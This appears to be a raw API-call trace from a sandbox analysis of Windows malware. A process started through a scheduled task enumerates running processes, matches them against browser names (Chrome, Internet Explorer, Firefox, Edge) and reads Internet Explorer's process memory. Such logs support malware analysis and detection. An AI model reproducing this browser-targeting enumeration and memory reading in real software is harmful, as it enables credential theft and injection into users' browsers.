	[0226.192] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.193] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0226.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.193] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0226.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5e6c
	[0226.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.194] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0226.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.195] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.196] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0226.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.196] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0226.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5e70
	[0226.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.198] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0226.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.198] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.198] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0226.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.199] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0226.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5e74
	[0226.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.200] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0226.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.201] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.202] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0226.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.202] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.203] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0226.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5e78
	[0226.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.204] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0226.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.204] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.205] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0226.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.205] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.205] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0226.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5e7c
	[0226.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.206] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0226.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.207] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0226.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.207] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0226.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.207] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.207] NtQueryInformationProcess (in: ProcessHandle=0x5e7c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0226.207] ReadProcessMemory (in: hProcess=0x5e7c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0226.208] ReadProcessMemory (in: hProcess=0x5e7c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0226.208] ReadProcessMemory (in: hProcess=0x5e7c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0226.208] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0226.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0226.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5e80
	[0226.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0226.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0226.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0226.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.210] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.210] NtQueryInformationProcess (in: ProcessHandle=0x5e80, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0226.210] ReadProcessMemory (in: hProcess=0x5e80, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0226.210] ReadProcessMemory (in: hProcess=0x5e80, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0226.210] ReadProcessMemory (in: hProcess=0x5e80, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0226.210] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0226.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0226.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5e84
	[0226.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.211] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0226.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.212] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.212] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0226.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.212] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.212] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0226.213] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5e88
	[0226.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.213] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0226.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.214] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.214] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0226.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.215] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5e8c
	[0226.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.216] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.217] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.217] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.217] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5e90
	[0226.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.219] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.219] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.220] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.220] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5e94
	[0226.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.221] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.221] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.222] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.222] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0226.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5e98
	[0226.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.223] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0226.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.223] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.224] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0226.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.224] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.224] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0226.225] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x5e9c
	[0226.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.225] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.225] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.226] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.226] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.226] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x5ea0
	[0226.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.227] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.227] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.228] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.228] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.228] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0226.229] CloseHandle (hObject=0x4fd0) returned 1
	[0226.229] Sleep (dwMilliseconds=0x64) 
	[0226.513] GetCurrentProcessId () returned 0x110
	[0226.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0226.518] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0226.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0226.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0226.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5ea4
	[0226.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.522] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0226.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.522] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.523] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0226.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.523] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0226.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5ea8
	[0226.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.524] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0226.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.525] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.525] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0226.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.525] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.525] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0226.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5eac
	[0226.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.526] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0226.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.527] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.527] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0226.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.527] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0226.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5eb0
	[0226.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.529] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0226.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.529] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.530] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0226.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.530] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0226.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5eb4
	[0226.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.531] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0226.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.531] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.532] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0226.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.532] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0226.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5eb8
	[0226.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.533] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0226.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.534] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.534] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0226.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.534] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0226.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5ebc
	[0226.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.536] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0226.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.536] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.536] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0226.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.536] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
